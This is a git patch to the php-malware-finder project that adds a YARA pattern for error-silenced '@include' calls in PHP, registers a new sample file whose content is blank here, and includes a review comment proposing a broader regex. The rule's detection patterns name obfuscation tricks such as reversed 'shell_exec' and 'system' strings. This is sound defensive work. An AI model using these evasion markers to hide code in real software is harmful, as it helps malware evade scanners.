From d9b7742bb7c1179f53429a0d8cab7f0bd04ffe00 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Tue, 26 Jun 2018 18:37:23 +0200
Subject: Detect things like '@include'

This should close #71
---
 php-malware-finder/php.yar | 1 +
 php-malware-finder/samples/real/include.php | 4 ++++
 php-malware-finder/tests.sh | 1 +
 3 files changed, 6 insertions(+)
 create mode 100644 php-malware-finder/samples/real/include.php
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 143b192..6a93fe1 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -102,6 +102,7 @@ rule DodgyPhp
 $double_var = /\${\s*\${/
 $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
 $reversed = /noitcnuf_etaerc|metsys|urhtssap|edulcni|etucexe_llehs/ nocase
+ $silenced_include =/@\s*include\s*/ nocase
 condition:
 (any of them) and not IsWhitelisted
diff --git a/php-malware-finder/samples/real/include.php b/php-malware-finder/samples/real/include.php
new file mode 100644
index 0000000..58712f1
--- /dev/null
+++ b/php-malware-finder/samples/real/include.php
@@ -0,0 +1,4 @@
+
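Review bot: The new `$silenced_include` string in `php.yar` matches `@include` (and, by prefix, `@include_once`) but leaves the equivalent `@require` / `@require_once` uncovered, so a silenced require still goes undetected by this rule. The trailing `\s*` can match the empty string and so has no effect on an unanchored pattern, and the missing space after `=` differs from the neighbouring strings; consider `$silenced_include = /@\s*(include|require)(_once)?\b/ nocase`. Because the pattern matches anywhere in a file, legitimate text such as a Blade-style `@include(...)` directive or an `@include` mentioned in a comment would presumably trigger it unless `IsWhitelisted` covers those files, which cannot be confirmed from this hunk. The `DodgyPhp` rule begins above the hunk and its closing brace lies below it.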